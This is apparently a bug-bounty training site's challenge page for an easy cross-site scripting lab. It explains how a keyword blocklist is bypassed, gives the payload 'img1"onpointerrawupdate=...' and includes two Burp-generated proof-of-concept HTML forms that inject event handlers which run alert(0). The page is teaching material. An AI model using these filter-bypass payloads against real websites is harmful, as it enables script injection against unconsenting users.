Change the class of our image and pick your favourite!

Important information

Our challenges do NOT require any bruteforcing/directory fuzzing/massive amounts of traffic. Please practise hacking on our challenges manually.

Failure to abide by the rules will put you at risk of being restricted from using our free challenges.

Change the class of our image and pick your favourite!

Begin challenge

Easy Cross Site Scripting (XSS)

Our basic HTML web application will allow you to easily change the style via class change. View various styles of images and decide which you think is best!

Once you're done playing, can you find any XSS? The developer's have made sure no malicious class names can be used.

Completed the challenge?

You can browse the intended solution to this challenge below.

Solution

Lots of developers rely on out-dated blocklists, or they simply only filter malicious event handlers such as onclick and onerror.

The mistake the developer made with this challenge is they were filtering for specific keywords! This is a bad approach to protecting against XSS.

Chrome POC

The challenge filter can be bypassed by sending imageClass=img1"onpointerrawupdate='alert(0)'"> as the POSTDATA, and then move your mouse over the image for the XSS to execute.

Working POC on Chrome:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form target="_blank" action="https://www.bugbountytraining.com/challenges/challenge-2.php" method="POST">
      <input type="hidden" name="imageClass" value="img1&quot;onpointerrawupdate&#61;&apos;alert&#40;0&#41;&apos;&quot;&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Firefox POC

onpointerrawupdate= only executes on Chrome, so what about Firefox? Well since the filter blocklist doesn't include everything (and this is why it's a bad approach), onmouseleave= will work on both firefox and chrome

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form target="_blank" action="https://www.bugbountytraining.com/challenges/challenge-2.php" method="POST">
      <input type="hidden" name="imageClass" value="img1&quot;onmouseleave&#61;&apos;alert&#40;0&#41;&apos;&quot;&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Challenge hints

Stuck? Click below to reveal hints!

Guides

What is Cross Site Scripting? Master XSS by BruteLogic Scanning JS files for bugs

Learn like a pro

Practise hacking on a fully functioning website containing real bugs found on bug bounty programs. Use your hacker mindset to uncover as many vulnerabilities as possible!

Become a BOUNTY HUNTER

BugBountyHunter

Important information